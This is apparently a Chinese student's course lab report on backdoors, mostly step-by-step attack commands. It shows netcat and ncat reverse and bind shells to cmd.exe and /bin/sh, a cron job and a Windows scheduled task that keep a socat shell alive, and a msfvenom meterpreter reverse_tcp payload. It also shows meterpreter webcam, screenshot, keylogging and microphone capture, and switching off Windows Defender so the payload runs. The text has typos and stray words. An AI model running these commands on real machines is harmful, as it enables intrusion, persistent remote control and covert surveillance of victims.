使用netcat获取主机操做Shell,cron启动linux
使用Socat获取主机操做Shell, 任务计划启动web
使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shellshell
使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权windows
例举你能想到的一个后门进入到你系统中的可能方式?tcp
答:收到虚假邮件,下载邮件的附件工具
例举你知道的后门如何启动起来(win及linux)的方式?网站
答:经过修改注册表设置为开机自启动;进入挂马网站.net
Meterpreter有哪些给你映像深入的功能?
答:开启摄像头,录制音频等操做。
如何发现本身有系统有没有被安装后门?
答:开启防火墙;下载专业的杀毒软件
1 在Linux中使用ifconfig查看Linux的ip地址
2 在Windows中使用ipconfig查看本机ip地址
3 windowsncatexe -l -p 5219
打开监听,Linuxnc ip 5219 -e /bin/sh
反弹链接win,而且在Windows cmd查看是否成功
1 Linux运行监听指令nc -l -p 5219
2 Windows反弹链接Linuxncat.exe -e cmd.exe ip 5219
3 在Linux shell下使用dir命令
1 在windows下输入命令:ncat.exe -l 5219
,实现监听5219端口
2 Kali下输入ncat ip
,链接到windows端口
1 windows端下,输入命令ncat.exe -l -p 5219,监听本机的5219端口
2 kali端下,输入crontab -e
,实现编辑一条定时任务。
3 插入* * * * /bin/netcat ip -e /bin/sh
4 保存退出,crontab -l
查看
1 win10系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->建立任务
2 填写任务名称:20165219
3 新建触发器
4 新建操做
5 导入socat.exe的路径,并添加参数:tcp-listen:5219 exec:cmd.exe,pty,stderr
(把cmd.exe绑定到端口5219,同时把cmd.exe的stderr重定向到stdout上)
6 锁定计算机,再次打开,运行任务。
7 在Linux shell中输入socat - tcp:ip:5219
1 kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe
2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe
3 Linux中输入nc ip < 20165219_backdoor.exe
在ncat文件夹下查看
4 使用msfconsole
进入msf控制台
5 进行一系列的设置
6 运行后门程序
1webcam_snap
能够使用摄像头拍照
2 使用creenshot
能够进行截屏
3 keyscan_start
记录下击键的过程
4 record_mic
能够截获一段音频
运行后门程序的时候, cMd拒绝访问,双击文件也不能够运行,关掉防火墙也不行 。
解决:把win10 控制面板中的 windows defender安全中心中的病毒威胁和防御功能关掉
经过此次实验明白了后门的原理。同时也加强了安全防御的意识,实验内容颇有趣。